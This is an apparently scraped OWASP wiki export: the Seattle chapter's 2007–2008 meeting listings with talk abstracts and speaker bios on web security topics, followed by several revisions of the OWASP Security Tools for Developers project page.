'''Concurrency Attacks in Web Applications'''<br />
<br />
Modern web application frameworks are designed for developer productivity and performance. They are highly scalable, object-oriented, and can be used to create a usable web site in a matter of minutes.<br />
<br />
Highly parallelized, object-oriented web application frameworks encourage programming practices that make managing state difficult for a typical programmer. In order to have a web application that is robust in a multi-threaded environment, the developer must carefully manage access to all resources that can shared by threads. Global variables, session variables, database access, and back-end systems are common examples of such resources, not to mention application-specific resources.<br />
<br />
Concurrency flaws result when security-sensitive resources are not managed properly. As we have seen with almost every other prevalent class of security flaws, mistakes happen often when doing the right thing is difficult. To make things worse, concurrency flaws are often subtle and are identified only through difficult targeted testing.<br />
<br />
This presentation will provide brief technical background against this class of flaw and enumerate testing techniques that help identify when flaws are present.<br />
<br />
--------------------------------------------------------------------------------<br />
<br />
'''Scott Stender''' is a founding partner of iSEC Partners, a strategic digital security organization. Scott brings with him several years of experience in large-scale software development and security consulting, having worked at companies such as @stake and Microsoft. Scott is a noted researcher who focuses on secure software engineering and security analysis of core technologies. He holds a BS in Computer Engineering from the University of Notre Dame.<br />
<br />
=== Previous Event 4 March (Tuesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
<br />
'''Date:''' 03/04/2008<br />
<br />
'''Time:''' 6:30PM<br />
<br />
'''Speakers:'''<br />
<br />
'''Speaker: Billy Rios'''<br />
<br />
'''Bad Sushi - Beating Phishers at Their Own Game'''<br />
<br />
This talk will expose tactics and tools used by phishers, show how easy it is to hack into servers that are used to perform phishing, demonstrate how easy it is so follow a phsisher's trail to find out how they share information on US Citizens including SSNs, bank account numbers, credit card numbers, ATM PINs, you name it.<br />
<br />
Phishers usually setup their sites on servers they have compromised. In other words, the phishers have already done the hard work and it is easy to gain access to these servers. Due to the sheer volume of sites that need to be setup to perform a successful phish, phishers tend to be sloppy and leave traces everywhere.<br />
<br />
This talk will expose some of the tactics and tools used by phishers. Actual walk-through of how compromised hosts were accessed to gain information about the phishers will be presented.<br />
<br />
This talk will also show how easy it is to construct a trail from a compromised host to obtain information about individuals that is spewed on hacker message boards located outside the United States.<br />
<br />
--------------------------------------------------------------------------------<br />
<br />
'''Billy Rios''' lives in a phish bowl and is constantly being sent emails from acquaintances all over the world. Billy has won the Internet lotto several times, is expecting large sums of abandoned money from a long lost relative in the Congo, and has received checks accidentally made out for 30,000 instead of 30 US dollars.<br />
<br />
<br />
'''Speaker: Jon McClintock'''<br />
<br />
Session management is one of the most overlooked areas of web application security, and yet it can also be the most challenging feature to get right in your web application. This talk will provide a brief overview of web session management, followed by an exposition into how several common web application frameworks implement session management, finishing with a discussion of several classes of vulnerabilities that can arise through poor session management.<br />
<br />
'''Jon McClintock''' is a Senior Consultant for Leviathan Security Group, where he specializes in application security from design through implementation and into deployment. Prior to Leviathan, Jon was a Senior Software Engineer on Amazon.com's Information Security team, where he worked with software teams to define security requirements, assess application security, and educate developers about security software best practices.<br />
<br />
'''Date: 1/23/2008'''<br />
<br />
'''Speakers:'''<br />
<br />
'''Waqas Nazir''', DigitSec<br />
<br />
[https://www.owasp.org/images/e/e9/Emerging_Threats_in_Distributed_Applications_%28Web_2%29.ppt presentation]<br />
<br />
Waqas Nazir has been working as an Information Security Consultant for clients such as Microsoft where he has delivered services in various arenas of information security. These include code reviews, black box assessments, product reviews, custom tools development for complex security problems, policy and process development. He has also worked with Microsoft Research (MSR) to develop a code analysis tool used for identifying areas of vulnerabilities in code. He has also been featured in Microsoft's Information Security Newsletter.<br />
<br />
Presentation Title: Emerging threats in Web 2.0<br />
<br />
Web 2.0 applications provide many rich features today such as hosting third party RSS Feeds, hosting third party web pages, translation services, and cross domain communication. While these rich features provide great functionality to end users, they can have serious security implications if not designed properly. Moreover, implementation flaws plague many of these features. This presentation will focus on some new emerging threats to Web 2.0 applications from a design and implementation perspective, leaving out the often covered Web 2.0 Vulnerabilities (Ajax, XSRF, etc).<br />
<br />
<br />
'''Chris Clark''', iSEC Partners<br />
<br />
Chris Clark is a Senior Security Consultant at iSEC Partners, Inc. He possesses several years of experience in secure application design, penetration testing, and security process management. Most recently Chris worked for Microsoft performing security analysis and verification on enterprise management software and was previously responsible for the security of a web-based payment platform processing over 20 million credit card transactions per day. Chris has extensive experience in developing and delivering security trainings for large organizations, software engineering utilizing Win32 and the .Net Framework, and analyzing threats to large scale distributed systems. At Microsoft, Chris was responsible for the coordination of multiple product groups following the Microsoft Secure Development Lifecycle.<br />
<br />
Presentation Title: Ruby on Rails Security<br />
<br />
Ruby on Rails has been hailed for its ability to increase developer productivity by making web development easier. Though Ruby on Rails may help developers create sites more quickly, it is no more immune to security threats than other web development frameworks. Chris Clark will present the means by which the OWASP Top Ten manifest themselves in a Ruby on Rails environment, provide best practices for preventing these attacks, and discuss his ongoing research in Ruby-specific security concerns.<br />
<br />
<br />
11/29/2007 @ 6:30PM PST - Seattle chapter meeting<br />
<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
<br />
'''Date:''' 11/29/2007<br />
<br />
'''Time:''' 6PM<br />
<br />
'''Speakers:'''<br />
<br />
'''Tom Gallagher''' has been intrigued with both physical and computer security from a young age. He is currently the lead of the Microsoft Office Security Test team. This team is primarily focused on penetration testing, writing security testing tools, and educating program managers, developers, and testers about security issues. Tom recently co-authored the MSPress title "Hunting Security Bugs".<br />
<br />
Presentation Title: Hunting security bugs in your code<br />
<br />
Description: Finding security bugs is often regarded as an activity requiring secret powers or extremely specialized knowledge. Some security bugs are difficult to uncover and require deep knowledge. However, with basic knowledge many areas can be tested without much effort. This presentation will show how to perform basic security testing using simple tools and the difference in effort between finding a bug and exploiting it.<br />
<br />
<br />
'''David E Stevens III''', Senior ROI Analyst, Symplified Inc.<br />
<br />
In 2006, Symplified recruited Stevens for his expertise and ability to clearly explain concepts like Return On Investment (ROI) and Total Cost of Ownership (TCO). Over the past 5 years Stevens has given dozens of presentations regarding ROI, and is a confident and charismatic speaker. Stevens is touring the U.S. representing Symplified and teaching how ROI can be applied to security and Identity investments to technical security user groups.<br />
<br />
Synopsis of "Understanding ROI, TCO and other key financial aspects of IT Security"<br />
<br />
In this presentation, Stevens teaches how security and IT professionals can obtain financing for important security initiatives using accounting principles such as Return On Investment (ROI) and Total Cost of Ownership (TCO). In this 30-minute presentation, the group learns what these terms mean and how they can be used to show the value of security software purchases. He concludes by sharing other tips on how the technology professional can better communicate with their business counterparts. This non-sales presentation is intended to equip attendees with useful tools that articulate the benefits of investing in IT security. Learn from Symplified's more than 30 years combined experience in Identity Management at hundreds of Fortune 500 organizations worldwide. Attendees receive a useful ROI calculator for IDM investments. This is a must attend presentation for anyone who has ever had trouble getting the funding they needed for a security software investment!<br />
<br />
<br />
09/06/2007 @ 6PM PST - Seattle chapter meeting<br />
<br />
'''Details:'''<br />
Location: <br />
Bellevue Las Margaritas <br />
437 108th Ave NE<br />
Bellevue, WA 98004<br />
(425) 453-0535<br />
<br />
Time: 6 o'clock<br />
<br />
'''Speakers:'''<br />
* '''Rob Rachwald''' - Rob is a 10-year veteran of the high tech industry. Rob started his tech career at Intel, where he worked on automating their complex supply chain. Rob managed US product marketing for Commerce One and managed their marketing efforts in Asia Pacific. Rob, then, managed marketing for Coverity and joined Fortify as the Director of Product Marketing focusing on security and financial services. <br />
** Online Banking - Abstract: Banks, often the biggest target of cyber attacks, have set an example for responsible security strategies. How do the world's leading financial institutions balance risk against the pressures of delivering software to customers quickly? How are developers trained to write code securely? How are software security tools, such as dynamic and static analysis, deployed for optimal use?<br />
* '''Damon Cortesi''' - Damon has worked in network and application security risk management for nearly a decade, beginning with his work as Systems and Security Administrator at his alma mater. Following school, he entered the professional arena as an Information Security Consultant for one of the top 10 CPA firms serving financial institutions including banks, credit unions, and event the major credit reporting bureaus. Most recently at IOActive, Mr. Cortesi has been serving the specialized needs of top technology companies in addition to standard penetration testing, web application security assessments, source code reviews, and PCI assessments.<br />
** Web Hacking 101 introduces the basic concepts of web application security including SQL Injection, Cross-Site Scripting (XSS), and typical application logic flaws found in an ASP-based web application. These concepts are then put to use in a live demonstration that illustrates the all-too-common ways of attacking a web application and gaining unauthorized access to sensitive information or restricted areas of a website. Demos will included manual SQL Injection techniques as well as the use of free/open-source tools used to expedite the extraction process, examples of both reflected and stored XSS that can be used to elevate the privileges of a user, and standard authorization bypass issues that developers often ignore. Finally, basic mitigation techniques will be discussed that can be put into place by developers to prevent these common hacking techniques.<br />
<br />
''' Update: ''' - Rob's slides can be downloaded from [http://www.owasp.org/images/f/f6/SANS_Online_Banking_Case_study.ppt here].<br />
''' Update #2: ''' - Damon's slides can be found [https://www.owasp.org/images/3/32/Web_Hacking_101.pdf here].<br />
<br />
----<br />
<br />
2/28/2007 @ 6PM PST - Seattle chapter meeting<br />
<br />
'''Details:'''<br />
<br />
Location: Bellevue Las Margaritas (http://www.lasmargaritasbellevue.com/)<br />
<br />
Time: 6 o’clock. <br />
<br />
'''Speakers:'''<br />
* '''Dinis Cruz (Chief OWASP Evangelist)''' - Directly from London, Dinis will be doing two presentations at this event:<br />
** '''Buffer Overflows on .Net and Asp.Net''' - One of the common myths about the .Net Framework is that it is immune to Buffer Overflows. Although this might be correct in pure managed and verifiable .Net code, large percentage of .Net and Asp.Net applications code is unmanaged code. In this talk Dinis will show the areas in .Net and Asp.Net applications that are vulnerable to Buffer Overflows (including the demo of a .Net Buffer Overflow Fuzzer).<br />
** '''OWASP, the Open Web Application Security Project''' - The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. All of the OWASP tools, documents, blogs, and chapters are free and open to anyone interested in improving application security. In this presentation Dinis will show the latest guides and tools from OWASP which should be part of every company's security efforts.<br />
** '''0wning Vista's userland - The CAS / UAC missed opportunity, and what I think MS should had done''' - In this presentation Dinis will explore the missed opportunity by Microsoft to use technologies like .Net's CAS (Code Access Security) and Vista's UAC (User Access Control) to create secure and trustworthy userland environments that protect the user's assets. In the hope that might make a small difference, ideas and solutions for the future will also be presented.<br />
<br />
* '''Brad Hill (Senior Security Consultant with iSEC Partners)''', will be speaking on:<br />
** '''XML Digital Signature and Encryption: Use and Abuse''' - The WS-Security set of standards is on the threshold of ubiquitous deployment and XML applications have already taken over the world. This presentation looks at two underlying technologies, XML Digital Signature (XMLDSIG) and XML Encryption (XMLENC), their place in the Web Services stack and their applicability to non-SOAP XML applications. Beginning with a basic overview of the standards, we will uncover some surprising caveats and risks in the use of these technologies.<br />
<br />
=== Previous Meeting 8 January 2007===<br />
1/8/2007 @ 6 o'clock - Seattle chapter meeting. <br />
<br />
'''Details:''' Location: Bellevue Las Margaritas (http://www.lasmargaritasbellevue.com/)<br />
Time: 6 o’clock. <br />
<br />
Speakers:<br />
<br />
Ward Spagenberg of IOActive on the topic "Unraveling PCI".<br />
<br />
Since there will be free food, beer and pop please let Mike de Libero know so we know how much to order.<br />
We look forward to seeing you all there!<br />
<br />
[[Category:Washington]]</div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&diff=114892OWASP Security Tools for Developers Project2011-08-01T04:34:53Z<p>Mcurphey: </p>
<hr />
<div>==== Home ====<br />
<br />
{| width="100%"<br />
|-<br />
! width="66%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused an open source stack and Agile development techniques,&nbsp;the concepts should be able to be easily applied to other styles of software engineering.&nbsp; <br />
<br />
Most people accept that tools can only effectively be applied to a fraction of software issues where the fraction is generally increasing but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software where security is one attribute.&nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments including managing requirements and user stories, IDE's, test management, source code management, version control, continuous intregration, deployment and monitoring. <br />
<br />
Most security tools today are written by and for security people who often (understandably)&nbsp;have a different lens and different needs from software developers and development teams. <br />
<br />
This project is operating under the belief that infusing security into the development teams work-flow through effective tools will have a significant impact on improving the security quality of the code they produce.<br> <br />
<br />
You can think of it as a project for developers by developers to improver software quality through better tooling that just so happens to be about security.&nbsp; <br />
<br />
| <br />
[[Image:Owasp std.png]] <br />
<br />
|}<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
== Wanna get involved? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....join the discussion [https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]''' <br />
<br />
While the project is open to all we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience in customizing Jenkins, extending Git, unit testing frameworks or customizing mangement tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like JBehave.&nbsp; <br />
<br />
Join the mailing list, hang out and say hi or contact the project leader&nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. <br />
<br />
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]<br />
<br />
| <br />
== What exactly are you producing? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' <br />
<br />
The project is still in its infancy but the plan is to produce the following: <br />
<br />
*Reference Architecture <br />
*Reference Implementation<br />
<br />
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &nbsp;<br> <br />
<br />
| <br />
== How are you doing this? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]&nbsp;'''....by being Agile of course!''' <br />
<br />
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! <br />
<br />
Our current timeline looks like: <br />
<br />
*August - Project Planning <br />
*September - Sprint 1 <br />
*October - Sprint 2 <br />
*November - Sprint 3 <br />
*December - Sprint 4<br />
<br />
In due course (when we have a backlog) we will publish a roadmap.&nbsp; <br />
<br />
|}<br />
<br />
<br> __NOTOC__ <headertabs /></div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&diff=114891OWASP Security Tools for Developers Project2011-08-01T02:06:40Z<p>Mcurphey: </p>
<hr />
<div>==== Home ====<br />
<br />
{| width="100%"<br />
|-<br />
! width="66%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused an open source stack and Agile development techniques,&nbsp;the concepts should be able to be easily applied to other styles of software engineering.&nbsp; <br />
<br />
Most people accept that tools can only effectively be applied to a fraction of software issues where the fraction is generally increasing but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software where security is one attribute.&nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments including managing requirements and user stories, IDE's, test management, source code management, version control, continuous intregration, deployment and monitoring. <br />
<br />
Most security tools today are written by and for security people who often (understandably)&nbsp;have a different lens and different needs from software developers and development teams. <br />
<br />
This project is operating under the belief that infusing security into the development teams work-flow through effective tools will have a significant impact on improving the security quality of the code they produce.<br> <br />
<br />
You can think of it as a project for developers by developers to improver software quality through better tooling that just so happens to be about security.&nbsp; <br />
<br />
| <br />
[[Image:Owasp std.png]] <br />
<br />
|}<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
== Wanna get involved? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....join the discussion [https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]''' <br />
<br />
While the project is open to all we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience in customizing Jenkins, extending Git, unit testing frameworks or customizing mangement tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like JBehave.&nbsp; <br />
<br />
Join the mailing list, hang out and say hi or contact the project leader&nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. <br />
<br />
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]<br />
<br />
| <br />
== What exactly are you producing? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' <br />
<br />
The project is still in its infancy but the plan is to produce the following: <br />
<br />
*Reference Architecture <br />
*Reference Implementation<br />
<br />
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &nbsp;<br> <br />
<br />
| <br />
== How are you doing this? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]&nbsp;'''....by being Agile of course!''' <br />
<br />
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! <br />
<br />
Our current timeline looks like: <br />
<br />
*August - Project Planning <br />
*September - Sprint 1 <br />
*October - Sprint 2 <br />
*November - Sprint 3 <br />
*December - Sprint 4<br />
<br />
In due course (when we have a backlog) well publish a roadmap.&nbsp; <br />
<br />
|}<br />
<br />
<br> __NOTOC__ <headertabs /></div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&diff=114889OWASP Security Tools for Developers Project2011-08-01T02:05:17Z<p>Mcurphey: </p>
<hr />
<div>==== Home ====<br />
<br />
{| width="100%"<br />
|-<br />
! width="66%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
This project is focused on defining, designing, developing and configuring security tools for software developmemt teams and their end-to-end software development process. While any reference material or code produced will be focused an open source stack and Agile development techniques,&nbsp;the concepts should be able to be easily applied to other styles of software engineering.&nbsp; <br />
<br />
Most people accept that tools can only effectively be applied to a fraction of software issues where the fraction is generally increasing but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software where security is one attribute.&nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments including managing requirements and user stories, IDE's, test management, source code management, version control, continuous intregration, deployment and monitoring. <br />
<br />
Most security tools today are written by and for security people who often (understandably)&nbsp;have a different lens and different needs from software developers and development teams. <br />
<br />
This project is operating under the belief that infusing security into the development teams work-flow through effective tools will have a significant impact on improving the security quality of the code they produce.<br> <br />
<br />
You can think of it as a project for developers by developers to improver software quality through better tooling that just so happens to be about security.&nbsp; <br />
<br />
| <br />
[[Image:Owasp std.png]] <br />
<br />
|}<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
== Wanna get involved? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....join the discussion [https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]''' <br />
<br />
While the project is open to all we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience in customizing Jenkins, extending Git, unit testing frameworks or customizing mangement tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like JBehave.&nbsp; <br />
<br />
Join the mailing list, hang out and say hi or contact the project leader&nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. <br />
<br />
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]<br />
<br />
| <br />
== What exactly are you producing? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' <br />
<br />
The project is still in its infancy but the plan is to produce the following: <br />
<br />
*Reference Architecture <br />
*Reference Implementation<br />
<br />
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &nbsp;<br> <br />
<br />
| <br />
== How are you doing this? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]&nbsp;'''....by being Agile of course!''' <br />
<br />
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! <br />
<br />
Our current timeline looks like:<br />
<br />
*August - Project Planning <br />
*September - Sprint 1 <br />
*October - Sprint 2 <br />
*November - Sprint 3 <br />
*December - Sprint 4<br />
<br />
In due course (when we have a backlog) well publish a roadmap.&nbsp;<br />
<br />
|}<br />
<br />
<br> __NOTOC__ <headertabs /></div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&diff=114885OWASP Security Tools for Developers Project2011-07-31T19:49:30Z<p>Mcurphey: </p>
<hr />
<div>==== Home ====<br />
<br />
{| width="100%"<br />
|-<br />
! width="66%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
This project is focused on defining, designing, developing and configuring security tools for software developmemt teams and their end-to-end software development process. While any reference material or code produced will be focused an open source stack and Agile development techniques,&nbsp;the concepts should be able to be easily applied to other styles of software engineering.&nbsp; <br />
<br />
Most people accept that tools can only effectively be applied to a fraction of software issues where the fraction is generally increasing but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce fucntional, stable, reliable and scalable software where security is one such attribute.&nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments including managing requirements and user stories, IDE's, test management, source code management, version control, continuous intregration, deployment and monitoring. <br />
<br />
Many security tools today are written by and for security people who often (understandably)&nbsp;have a different lens and different needs from software developers and development teams. <br />
<br />
This project is operating under the belief that infusing security into the development teams work-flow through effective tools will have a significant impact on improving the security quality of the code they produce.<br> <br />
<br />
You can think of it as a project for developers by developers that just so happens to be about security.&nbsp; <br />
<br />
| <br />
[[Image:Owasp std.png]] <br />
<br />
|}<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
== Wanna get involved? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....join the discussion [https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]''' <br />
<br />
While the project is open to all we are particularly loking for developers who will actively contributing code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing mangement tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&nbsp; <br />
<br />
Join the mailing list, hang out and say hi or contact the project leader&nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. <br />
<br />
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]<br />
<br />
|<br />
<br />
== What exactly are you producing? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' <br />
<br />
The project is still in it's infancy but the plan is to produce the following: <br />
<br />
*Reference Architecture <br />
*Reference Implementation<br />
<br />
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &nbsp;<br> <br />
<br />
| <br />
== How are you doing this? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]&nbsp;'''....by being Agile of course!''' <br />
<br />
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! <br />
<br />
*August - Project Planning <br />
*September - Sprint 1 <br />
*October - Sprint 2 <br />
*November - Sprint 3 <br />
*December - Sprint 4<br />
<br />
|}<br />
<br />
<br> __NOTOC__ <headertabs /></div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&diff=114884OWASP Security Tools for Developers Project2011-07-31T19:48:28Z<p>Mcurphey: </p>
<hr />
<div>==== Home ====<br />
<br />
{| width="100%"<br />
|-<br />
! width="66%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
This project is focused on defining, designing, developing and configuring security tools for software developmemt teams and their end-to-end software development process. While any reference material or code produced will be focused an open source stack and Agile development techniques,&nbsp;the concepts should be able to be easily applied to other styles of software engineering.&nbsp; <br />
<br />
Most people accept that tools can only effectively be applied to a fraction of software issues where the fraction is generally increasing but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce fucntional, stable, reliable and scalable software where security is one such attribute.&nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments including managing requirements and user stories, IDE's, test management, source code management, version control, continuous intregration, deployment and monitoring. <br />
<br />
Many security tools today are written by and for security people who often (understandably)&nbsp;have a different lens and different needs from software developers and development teams. <br />
<br />
This project is operating under the belief that infusing security into the development teams work-flow through effective tools will have a significant impact on improving the security quality of the code they produce.<br> <br />
<br />
You can think of it as a project for developers by developers that just so happens to be about security.&nbsp; <br />
<br />
| <br />
[[Image:Owasp std.png]] <br />
<br />
|}<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
== Wanna get involved? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....join the discussion''' <br />
<br />
While the project is open to all we are particularly loking for developers who will actively contributing code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing mangement tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&nbsp; <br />
<br />
Join the mailing list, hang out and say hi or contact the project leader&nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. <br />
<br />
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]<br />
<br />
| <br />
== What exactly are you producing? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' <br />
<br />
The project is still in it's infancy but the plan is to produce the following: <br />
<br />
*Reference Architecture <br />
*Reference Implementation<br />
<br />
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &nbsp;<br> <br />
<br />
| <br />
== How are you doing this? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]&nbsp;'''....by being Agile of course!''' <br />
<br />
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! <br />
<br />
*August - Project Planning <br />
*September - Sprint 1 <br />
*October - Sprint 2 <br />
*November - Sprint 3 <br />
*December - Sprint 4<br />
<br />
|}<br />
<br />
<br> __NOTOC__ <headertabs /></div>Mcurpheyhttps://wiki.owasp.org/index.php?title=File:Owasp_std.png&diff=114883File:Owasp std.png2011-07-31T19:31:42Z<p>Mcurphey: uploaded a new version of &quot;File:Owasp std.png&quot;</p>
<hr />
<div>OWASP STD Project Banner</div>Mcurpheyhttps://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&diff=114882OWASP Security Tools for Developers Project2011-07-31T19:28:46Z<p>Mcurphey: </p>
<hr />
<div>==== Home ====<br />
<br />
{| width="100%"<br />
|-<br />
! width="66%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
This project is focused on defining, designing, developing and configuring security tools for software developmemt teams and their end-to-end software development process. While any reference material or code produced will be focused an open source stack and Agile development techniques,&nbsp;the concepts should be able to be easily applied to other styles of software engineering.&nbsp; <br />
<br />
Most people accept that tools can only effectively be applied to a fraction of software issues where the fraction is generally increasing but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce fucntional, stable, reliable and scalable software where security is one such attribute.&nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments including managing requirements and user stories, IDE's, test management, source code management, version control, continuous intregration, deployment and monitoring. <br />
<br />
Many security tools today are written by and for security people who often (understandably)&nbsp;have a different lens and different needs from software developers and development teams. <br />
<br />
This project is operating under the belief that infusing security into the development teams work-flow through effective tools will have a significant impact on improving the security quality of the code they produce.<br> <br />
<br />
You can think of it as a project for developers by developers that just so happens to be about security.&nbsp; <br />
<br />
| <br />
[[Image:Owasp std.png]] <br />
<br />
|}<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
== Wanna get involved? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....join the discussion''' <br />
<br />
While the project is open to all we are particularly loking for developers who will actively contributing code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing mangement tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&nbsp; <br />
<br />
Join the mailing list, hang out and say hi or contact the project leader&nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. <br />
<br />
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]<br />
<br />
| <br />
== What exactly are you producing? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' <br />
<br />
The project is still in it's infancy but the plan is to produce the following: <br />
<br />
*Reference Architecture <br />
*Reference Implementation<br />
<br />
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will inlcude it may inlcude IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &nbsp;<br> <br />
<br />
| <br />
== How are you doing this? ==<br />
<br />
[[Image:Asvs-bulb.jpg]]&nbsp;'''....by being Agile of course!''' <br />
<br />
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! <br />
<br />
*August - Project Planning <br />
*September - Sprint 1 <br />
*October - Sprint 2 <br />
*November - Sprint 3 <br />
*December - Sprint 4<br />
<br />
|}<br />
<br />
<br> __NOTOC__ <headertabs /></div>Mcurpheyhttps://wiki.owasp.org/index.php?title=File:Owasp_std.png&diff=114881File:Owasp std.png2011-07-31T19:27:16Z<p>Mcurphey: OWASP STD Project Banner</p>
<hr />
